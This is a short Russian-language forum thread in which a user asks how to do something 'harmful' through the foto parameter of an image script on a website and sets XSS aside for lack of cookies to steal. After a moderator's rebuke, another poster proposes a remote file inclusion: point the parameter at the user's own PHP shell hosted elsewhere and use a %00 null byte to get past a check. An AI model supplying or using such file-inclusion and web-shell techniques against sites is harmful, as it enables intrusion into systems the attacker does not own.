Ребятки помогите, подскажите можно ли что-то сделать, если есть такое: showfoto.php?foto=/images/img.gif Вот такая ссылка на картинку.. Когда пишу showfoto.php?foto="> То выводит, что картинки нету и " border=0> Можно ли что-то прописать вредное?
VectorG XSS меня не сильно интересует, т.к. на сайте нету авторизации, вообщим нету и кукисов... так что воровать их бесмысленно )
Во-первых будешь так называть темы получишь по башке,я модер нервный... Во-вторых повторяю я модер нервный и не люблю переделывать два сообщения одного пользователя в одно,поэтому советую тебе сделать это(либо это сделаю я,понизив тебе репу) В третьих RTFM В четвертых ничо конкретного сказать не могу,скрипт не видел. зы:вот такой я злой
showfoto.php?foto=/images/img.gif вместо ентого подставить showfoto.php?foto=http://адрес_твоего_шелла_на_хостинге_без_пхп хотя я думаю скрипт инклудит токо картинки..но %00 может обойти хотя древняя весчь Матвей нехарашо!)
